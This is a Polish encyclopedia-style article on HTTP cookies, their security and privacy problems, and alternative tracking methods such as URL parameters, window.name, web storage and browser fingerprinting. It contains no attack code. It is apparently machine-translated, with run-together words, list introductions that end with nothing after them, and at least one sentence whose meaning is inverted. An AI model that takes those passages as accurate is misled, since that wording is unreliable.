Zakłada się, że każda witryna ma własne pliki cookie, więc jedna witryna nie powinna być w stanie modyfikować ani ustawiać plików cookie powiązanych z inną witryną. Luka w zabezpieczeniach przeglądarki internetowej może pozwolić złośliwym witrynom na złamanie tej reguły. Wykorzystywanie takiej wady jest potocznie nazywane gotowaniem cross-site . Celem takich ataków może być kradzież identyfikatora sesji.
Użytkownicy powinni korzystać z najnowszych wersji przeglądarek internetowych, w których te luki są praktycznie wyeliminowane.
Stosowanie plików cookie może generować sprzeczność między stanem klienta a stanem zapisanym w pliku cookie. Jeśli użytkownik pozyska plik cookie i kliknie przycisk „Wstecz” przeglądarki, stan przeglądarki zasadniczo nie będzie taki sam, jak przed tym przejęciem. Przykładowo, jeżeli koszyk sklepu internetowego jest wykonany za pomocą plików cookies, zawartość koszyka nie może ulec zmianie, gdy użytkownik powróci do historii przeglądarki: jeżeli użytkownik naciśnie przycisk, aby dodać artykuł do swojego koszyka i kliknie przycisk „ Powrót”, artykuł pozostaje w tym. Może to nie być intencją użytkownika, który z pewnością chce zrezygnować z dodania artykułu. Może to prowadzić do zawodności, zamieszania i błędów. Dlatego twórcy stron internetowych powinni być świadomi tego problemu i wdrożyć środki radzenia sobie z takimi sytuacjami.
Trwałe pliki cookie zostały skrytykowane przez ekspertów ds. prywatności za to, że nie wygasają wystarczająco wcześnie, a zatem umożliwiają witrynom śledzenie użytkowników i budowanie ich profilu na bieżąco. Ten aspekt plików cookie jest również częścią problemu przejmowania sesji, ponieważ skradziony trwały plik cookie może służyć do podszywania się pod użytkownika przez dłuższy czas.
Niektóre operacje, które można wykonać za pomocą plików cookie, można również wykonać za pomocą innych mechanizmów, które pozwalają zrezygnować z plików cookie lub odtworzyć usunięte pliki cookie, które powodują problemy z prywatnością w ten sam sposób (lub czasami gorzej, ponieważ są niewidoczne) niż pliki cookie.
Użytkownicy mogą być śledzeni za pomocą adresu IP komputera wywołującego stronę. Ta technika jest dostępna od czasu wprowadzenia sieci World Wide Web , ponieważ podczas pobierania stron serwer żąda adresu IP komputera z uruchomioną przeglądarką lub serwerem proxy , jeśli używany jest serwer proxy. Serwer może śledzić te informacje, czy są używane pliki cookie. Jednak te adresy są zazwyczaj mniej niezawodne w identyfikacji użytkownika niż pliki cookie, ponieważ komputery i serwery proxy mogą być współużytkowane przez wielu użytkowników, a ten sam komputer może otrzymać inny adres IP podczas każdej sesji roboczej (tak jak c jest często w przypadku połączeń telefonicznych ).
Śledzenie według adresów IP może być niezawodne w pewnych sytuacjach, takich jak połączenia szerokopasmowe, które utrzymują ten sam adres IP przez długi czas, o ile zasilanie jest włączone.
Niektóre systemy, takie jak Tor, mają na celu zachowanie anonimowości w Internecie i uniemożliwienie lub niepraktyczne śledzenie według adresu IP.
Bardziej precyzyjna technika polega na osadzeniu informacji w adresach URL. Część ciągu zapytania w adresie URL jest jedną z technik, które są zwykle używane w tym celu, ale można również użyć innych części. Zarówno serwlet Java, jak i mechanizmy sesji PHP wykorzystują tę metodę, jeśli pliki cookie nie są włączone.
Ta metoda obejmuje serwer sieci Web dołączający żądania ciągów znaków do łączy strony sieci Web, która przenosi go, gdy jest wysyłany do przeglądarki. Gdy użytkownik kliknie łącze, przeglądarka zwraca do serwera załączony ciąg zapytania.
Wykorzystywane w tym celu ciągi zapytań i pliki cookie są bardzo podobne, zarówno jako informacje arbitralnie wybrane przez serwer, jak i zwracane przez przeglądarkę. Istnieje jednak kilka różnic: Gdy adres URL zawierający ciąg zapytania jest ponownie używany, te same informacje są wysyłane do serwera. Na przykład, jeśli preferencje użytkownika są zakodowane w ciągu zapytania adresu URL, a użytkownik wyśle ten adres e-mail do innego użytkownika, użytkownik ten również będzie mógł korzystać z tych preferencji. Z drugiej strony, gdy użytkownik dwukrotnie wchodzi na tę samą stronę, nie ma gwarancji, że ten sam ciąg zapytania zostanie użyty za każdym razem. Na przykład, jeśli użytkownik po raz pierwszy wchodzi na stronę ze strony wewnętrznej witryny i po raz drugi wchodzi na tę samą stronę ze strony zewnętrznej, ciąg zapytania dla strony witryny jest zwykle inny, podczas gdy pliki cookie są takie same.
Inne wady łańcuchów zapytań są związane z bezpieczeństwem: przechowywanie danych identyfikujących sesję w łańcuchach zapytań umożliwia lub upraszcza ataki polegające na utrwalaniu sesji, ataki na referencje identyfikatorów i inne exploity. Przekazywanie identyfikatorów sesji jako plików cookie HTTP jest bezpieczniejsze.
Jedną z form śledzenia sesji używanych przez ASP.NET jest używanie formularzy internetowych z ukrytymi polami. Ta technika jest bardzo podobna do używania ciągów zapytań URL do przenoszenia informacji i ma te same zalety i wady; a jeśli formularz jest przetwarzany metodą HTTP GET, pola faktycznie stają się częścią adresu URL przeglądarki, która wyśle go podczas przesyłania formularza. Jednak większość formularzy jest przetwarzana za pomocą protokołu HTTP POST, który powoduje dodanie informacji z formularza, w tym ukrytych pól, jako dodatkowego wpisu, który nie jest ani częścią adresu URL, ani pliku cookie.
Takie podejście ma dwie zalety z perspektywy śledzenia: po pierwsze, informacje o śledzeniu umieszczone w kodzie źródłowym HTML i we wpisie POST zamiast w adresie URL pozwolą przeciętnemu użytkownikowi nie zauważyć tego śledzenia; po drugie, sesja informacyjna nie jest kopiowana, gdy użytkownik kopiuje adres URL (na przykład w celu zapisania strony na dysku lub wysłania jej pocztą e-mail).
Wszystkie popularne przeglądarki internetowe mogą przechowywać dość dużą ilość danych (od 2 MB do 32 MB ) za pomocą JavaScript przy użyciu właściwości DOM window.name . Dane te mogą być wykorzystywane zamiast sesji plików cookie i są również wykorzystywane w wielu domenach. Technika może być połączona z obiektami JSON w celu przechowywania złożonego zestawu zmiennych sesji po stronie klienta.
Minusem jest to, że każde oddzielne okno lub karta początkowo będzie window.namepuste; podczas przeglądania kart (otwieranych przez użytkownika) oznacza to, że karty otwierane pojedynczo nie będą miały nazwy okna. Dodatkowo window.namemoże służyć do śledzenia odwiedzających w różnych witrynach, co może stanowić zagrożenie dla prywatności.
Pod pewnymi względami może to być bezpieczniejsze niż pliki cookie, ze względu na brak zaangażowania serwera, co sprawia, że sniffer cookies są odporne na atak sieciowy. Jeśli jednak zostaną podjęte specjalne środki w celu ochrony danych, są one narażone na dalsze ataki, ponieważ dane są dostępne za pośrednictwem innych witryn otwartych w tym samym oknie.
Protokół HTTP zawiera podstawowe protokoły uwierzytelniania dostępu oraz skrót uwierzytelniania dostępu, który umożliwia dostęp do strony internetowej tylko wtedy, gdy użytkownik podał nazwę użytkownika i hasło. Jeśli serwer żąda certyfikatu w celu przyznania dostępu do strony internetowej, przeglądarka żąda go od użytkownika, a po uzyskaniu przeglądarka przechowuje go i wysyła we wszystkich kolejnych żądaniach HTTP. Informacje te mogą służyć do śledzenia użytkownika.
Jeśli przeglądarka zawiera wtyczkę Adobe Flash Player , lokalne obiekty udostępnione mogą być używane w tym samym celu, co pliki cookie. Mogą być atrakcyjnym wyborem dla twórców stron internetowych, ponieważ:
Ten ostatni punkt, który odróżnia politykę zarządzania plikami cookie od zasad dotyczących lokalnych obiektów udostępnionych firmy Adobe, rodzi pytania dotyczące zarządzania przez użytkownika jego ustawieniami poufności: musi on mieć świadomość, że zarządzanie przez niego plikami cookie nie ma wpływu na zarządzanie lokalnymi obiektami udostępnionymi. przedmioty i odwrotnie.
Kolejna krytyka tego systemu dotyczy faktu, że można go używać tylko za pośrednictwem wtyczki Adobe Flash Player, która jest zastrzeżona, a nie standardem sieciowym .
Niektóre przeglądarki internetowe obsługują skrypt oparty na mechanizmie trwałości, który pozwala stronie przechowywać informacje lokalnie do późniejszego wykorzystania. Na przykład Internet Explorer obsługuje trwałe informacje w historii przeglądarki, w ulubionych, w formacie zapisanym w XML lub bezpośrednio ze strony internetowej zapisanej na dysku. W przypadku przeglądarki Microsoft Internet Explorer 5 istnieje metoda podana przez użytkownika, dostępna poprzez zachowania DHTML .
W3C wprowadzony w HTML 5 Nowa przechowywania danych po stronie klienta JavaScript API o nazwie przechowywanie stron internetowych i na stałe zastąpić pliki cookies. Jest podobny do plików cookie, ale o znacznie zwiększonej pojemności i bez przechowywania informacji w nagłówku żądań HTTP. API pozwala na dwa rodzaje przechowywania w sieci: localstoragei sessionstorage, podobne do trwałych plików cookie i plików cookie sesji (z tą różnicą, że pliki cookie sesji wygasają, gdy przeglądarka jest zamknięta, a zmienne sessionstoragewygasają, gdy karta jest zamknięta) . Pamięć masowa internetowa jest obsługiwana przez Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 i Opera 10.50.
Inny mechanizm zwykle opiera się na buforowaniu przeglądarek (radząc sobie z pamięcią, a nie odświeżaniem) za pomocą programów JavaScript na stronach internetowych. Na przykład strona może zawierać tag <script type="text/javascript" src="exemple.js">. Przy pierwszym załadowaniu strony ładowany jest również program example.js. W tym momencie program pozostaje w pamięci podręcznej, a odwiedzana strona nie jest ponownie ładowana. W konsekwencji, jeśli program zawiera zmienną globalną (na przykład var id = 3243242;), ten identyfikator pozostaje ważny i może być używany przez inny kod JavaScript po ponownym załadowaniu strony lub po załadowaniu strony łączącej program. Główną wadą tej metody jest to, że zmienna globalna JavaScript musi być statyczna, co oznacza, że nie można jej zmienić ani usunąć jak cookie.
Fingerprint przeglądarka jest zebrane informacje o ustawieniach konfiguracyjnych przeglądarkę w celach identyfikacyjnych. Te odciski palców mogą służyć do pełnej lub częściowej identyfikacji użytkownika Internetu lub urządzenia, nawet gdy pliki cookie są wyłączone.
Podstawowe informacje na temat konfiguracji przeglądarek internetowych od dawna są gromadzone przez służby oglądalności witryn w celu dokładnego pomiaru ruchu ludzkiego w sieci i wykrywania różnych form oszustw związanych z kliknięciami . Z pomocą języków skryptowych po stronie klienta możliwe jest teraz znacznie dokładniejsze zbieranie informacji. Konwersja tych informacji na ciąg bitów tworzy odcisk palca urządzenia. W 2010 roku Electronic Frontier Foundation (EFF) zmierzyła entropię odcisku palca przeglądarki na co najmniej 18,1 bita, a to było przed postępami w odcisku palca płótna, które dodały 5,7 bita przy tej entropii.
Firma Apple stosuje technikę śledzenia o nazwie „identyfikator dla reklamodawców” (IDFA). Ta technika przypisuje unikalny identyfikator każdemu użytkownikowi narzędzia działającego w systemie iOS (na przykład iPhone lub iPad ). Ten identyfikator jest następnie używany przez sieć reklamową Apple, iAd, w celu określenia, które reklamy oglądają użytkownicy i na które odpowiadają.
Pliki cookie to małe pliki tekstowe przechowywane przez przeglądarkę internetową na dysku twardym odwiedzającego witrynę, które służą (między innymi) do zapisywania informacji o odwiedzającym lub jego podróży przez witrynę. Webmaster może zatem rozpoznać zwyczajów użytkownika i spersonalizować prezentację swojej stronie dla każdego użytkownika; pliki cookie umożliwiają następnie zapamiętanie liczby artykułów wyświetlanych na stronie głównej lub zachowanie danych logowania dla ewentualnej strony prywatnej: gdy odwiedzający powraca do witryny, nie musi już wpisywać jej nazwy i hasło do rozpoznania, ponieważ są one automatycznie odczytywane w pliku cookie.
Plik cookie ma ograniczoną żywotność, ustaloną przez projektanta witryny. Mogą również wygasnąć pod koniec sesji w witrynie, co odpowiada zamknięciu przeglądarki. Pliki cookie są powszechnie używane, aby ułatwić życie odwiedzającym i przedstawić im bardziej istotne informacje. Ale specyficzne techniki umożliwiają śledzenie odwiedzającego na kilku stronach, a tym samym zbieranie i sprawdzanie bardzo obszernych informacji na temat jego nawyków. Dzięki tej metodzie korzystanie z plików cookie zyskało reputację techniki nadzoru, która narusza prywatność odwiedzających, co niestety w wielu przypadkach odpowiada rzeczywistości z powodów, które nie są „techniczne” lub nie szanują oczekiwań użytkowników.
W odpowiedzi na te uzasadnione obawy, HTML 5 wprowadza nowe API JavaScript do przechowywania danych po stronie klienta o nazwie Web storage , które jest znacznie bezpieczniejsze io większej pojemności, które ma na celu zastąpienie plików cookie.
W przypadku niektórych przeglądarek plik cookie można łatwo modyfikować, faktycznie do ręcznej zmiany wartości wystarczy program do edycji tekstu ( np. Notatnik ).
Pliki cookie są zapisywane różnie w zależności od przeglądarki:
Przeglądarki proszone są o wsparcie co najmniej :
(fr) Ten artykuł zawiera fragmenty Free On-line Dictionary of Computing, który upoważnia do korzystania z jego treści na licencji GFDL .
Informacje prawne (w języku francuskim ):
W sprawie dyrektywy 2009/136/WE zmieniającej dyrektywę 2002/22/WE w sprawie usługi powszechnej i praw użytkowników w odniesieniu do sieci i usług łączności elektronicznej, dyrektywy 2002/58/WE w sprawie przetwarzania danych osobowych i ochrony prywatności w łączności elektronicznej sektor i rozporządzenie (WE) nr 2006/2004 w sprawie współpracy między organami krajowymi odpowiedzialnymi za zapewnienie stosowania przepisów dotyczących ochrony konsumentów:Informacje techniczne (w języku angielskim ):